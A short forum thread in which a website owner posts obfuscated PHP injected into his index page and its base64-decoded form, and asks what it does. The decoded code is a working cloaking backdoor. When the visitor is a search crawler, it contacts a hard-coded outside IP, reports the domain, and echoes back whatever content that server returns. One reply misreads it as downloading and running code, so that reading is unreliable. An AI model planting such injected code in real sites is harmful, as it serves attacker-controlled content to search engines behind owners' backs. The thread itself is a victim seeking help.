Please help understand this code

[rbarnett]

I noticed the index page on my site was modified this morning and found this code inserted at the bottom of the page:

 

<!--ddgbsre_erd_sdd--><?php eval(base64_decode("aWYoc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdnb29nbGUnKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3lhaG9vJykgb3Igc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdtc24nKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ2xpdmUnKSkNCnsNCiAgJHIgPSAnJzsNCiAgaWYoJGY9QGZzb2Nrb3BlbignOTEuMjA3LjQuMTgnLDgwLCRlLCRlciwxMCkgYW5kIEBmcHV0cygkZiwgIkdFVCAvbGlua2l0L2luLnBocD9kb21haW49IiAuIHVybGVuY29kZSgkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSkgLiAiJnVzZXJhZ2VudD0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiIEhUVFAvMS4wXHJcbkhvc3Q6IDkxLjIwNy40LjE4XHJcblxyXG4iKSkNCiAgd2hpbGUoICRsID0gZnJlYWQoJGYsIDEwMjQpKSAkciAuPSAkbDsNCiAgQGZjbG9zZSgkZik7DQogICRwPXN0cnBvcygkciwiXHJcblxyXG4iKTsgZWNobyBzdWJzdHIoJHIsJHArNCk7DQp9"));

 

I printed out what is decoded:

if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live')) { $r = ''; if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n")) while( $l = fread($f, 1024)) $r .= $l; @fclose($f); $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4); }

 

Can someone please interpret what this code is trying to do?  I noticed that the IP address is coming from the Ukraine.

 

Thank you

[Psycho]

To be honest it's not worth my time to try and decypher. It can't be good though. It's probably downloading some code off of their server and running it on yours. Just delete it, find the hole they crawled in through and plug it up.

[rbarnett]

Thank you.  I appreciate your response.  I'm on the line now with my hosting company to try and do so.